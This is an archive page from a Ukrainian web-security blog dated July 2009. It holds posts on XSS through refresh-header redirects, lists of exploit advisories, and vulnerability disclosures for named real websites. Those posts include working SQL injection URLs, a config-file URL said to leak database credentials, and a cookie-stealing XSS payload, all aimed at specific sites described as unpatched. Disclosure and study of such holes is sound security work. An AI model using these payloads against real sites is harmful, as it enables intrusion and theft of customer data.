Архів за Липень, 2009

Хакінг Веб 2.0 - Захист AJAX та Веб Сервісів

22:45 04.07.2009

В своїй презентації Hacking Web 2.0 - Defending Ajax and Web Services, Shreeraj Shah розповідає про хакінг Веб 2.0. Про захист AJAX додатків та Веб Сервісів.

Виконання JavaScript через редирекцію в Firefox

20:04 04.07.2009

В своєму записі Firefox Header Redirection JavaScript Execution, RSnake ще в березні 2007 розповів про знайдену ним можливість виконання JavaScript коду через редирекцію через серверні заголовки. Він використав редирекцію з часовою затримкою (в декілька секунд), для виконання JS через редирекцію через заголовок refresh.

Дана атака спрацювала в нього лише в Firefox (в мене дана атака також спрацювала в Mozilla). А в коментарях до запису, читачі сайту зазначили, що в Safari дана атака також працює.

Нещодавно я писав про Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome, що я знайшов 28.06.2009. В даному випадку також використовується заголовок refresh.

Але на відміну від Роберта aka RSnake, в моєму дослідженні йдеться не лише про уразливість в Firefox (і в браузерах на движку Мозіла), а взагалі в усіх браузерах (зокрема тих, що є в мене). І серед усіх браузерів дана уразливість була виправлена лише в Firefox 3.0.9.

Іншою визначальною особливістю мого метода є те, що це редирекція без затримки (тобто з нульовою затримкою). Яка і дозволяє даній атаці через заголовок refresh працювати в усіх браузерах (з числа мною перевірених). Тому даний метод є цікавим вектором XSS атак.

Добірка уразливостей

16:13 04.07.2009

В даній добірці уразливості в веб додатках:

  • Xitami Web Server Multiple Vulnerabilities (Exploit) (деталі)
  • XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower (деталі)
  • PHP-NUKE SQL Module’s Name 4ndvddb (деталі)
  • BitTorrent Clients and CSRF (деталі)
  • MorASP Anket Sistemi v2.0 [PID] Bypass Vulnerability (tr) (деталі)
  • phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability (деталі)
  • gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability (деталі)
  • OkulAjansi [ID] Remote SQL Injection Vulnerability (деталі)
  • Yuhhu Pubs Black Cat Remote SQL Injection Exploit (деталі)
  • Pluck Local File inclusion (деталі)

Уразливості на datingsites1000.com

23:57 03.07.2009

У жовтні, 02.10.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation, SQL Injection, Abuse of Functionality та Information Leakage уразливості на сайті http://datingsites1000.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

Уразливості на tvshop.com.ua

19:26 03.07.2009

21.04.2009

У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2009

Full path disclosure:

http://tvshop.com.ua/itemlist.php?cid=’

http://tvshop.com.ua/item.php

http://tvshop.com.ua/itemlist.php

http://tvshop.com.ua/catalog.php

SQL Injection:

http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0

http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*

MySQL 4.0.27-standard-log

Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує :-) .

Information Leakage:

http://tvshop.com.ua/init.tpl

Витік login, password і name для бази даних та Source Code Disclosure.

Дані уразливості досі не виправлені.

Добірка експлоітів

16:14 03.07.2009

В даній добірці експлоіти в веб додатках:

  • CF_Auction (forummessage) Blind SQL Injection Vulnerability (деталі)
  • CF_Calendar (calendarevent.cfm) Remote SQL Injection Vulnerabilty (деталі)
  • CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities (деталі)
  • Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability (деталі)
  • phpAddEdit 1.3 (editform) Local File Inclusion Vulnerability (деталі)
  • eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req) (деталі)
  • MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vuln (деталі)
  • evCal Events Calendar Database Disclosure Vulnerability (деталі)
  • PhpAddEdit 1.3 (Cookie) Login Bypass Vulnerability (деталі)
  • Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Ad Management Java (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability (деталі)
  • PHP Support Tickets 2.2 Remote File Upload Vulnerability (деталі)
  • Exploits NULL pointer in Remotely Anywhere 8.0.668 (деталі)

Уразливості на www.linkexchanger.ru, www.od.com.ua, і www.lishnih.net

23:58 02.07.2009

У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.

XSS:

POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

XSS через GET:

http://www.linkexchanger.ru

http://www.od.com.ua

http://www.lishnih.net

Експлоіти для Apache №7

22:35 02.07.2009

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.

  • Apache Tomcat untime.getRuntime().exec() Privilege Escalation (win) (деталі)
  • Apache mod_dav / svn Remote Denial of Service Exploit (деталі)

Пошкодження пам’яті в Adobe Shockwave Player

20:13 02.07.2009

Виявлене пошкодження пам’яті в Adobe Shockwave Player.

Уразливі версії: Adobe Shockwave Player 11.5.

Пошкодження пам’яті при відкритті файлів Adobe Director 10.

  • Security Update available for Shockwave Player (деталі)
  • Adobe Shockwave Player Director File Parsing Pointer Overwrite Vulnerability (деталі)

Добірка уразливостей

16:40 02.07.2009

В даній добірці уразливості в веб додатках:

  • D-Link DIR-100 long url filter evasion (деталі)
  • Turuncu Galeri [galeri_edit.asp] Permission Bypass Vulnerability (деталі)
  • Sagem router f@st 2404 remote reset poc (деталі)
  • Sagem Router F@ST 2404 Remote Denial Of Service Exploit (деталі)
  • RSS-aggregator Multiple vulnerabilities (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit (деталі)
  • Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC (деталі)
  • Xpoz SQL-INJECTION, XSS (деталі)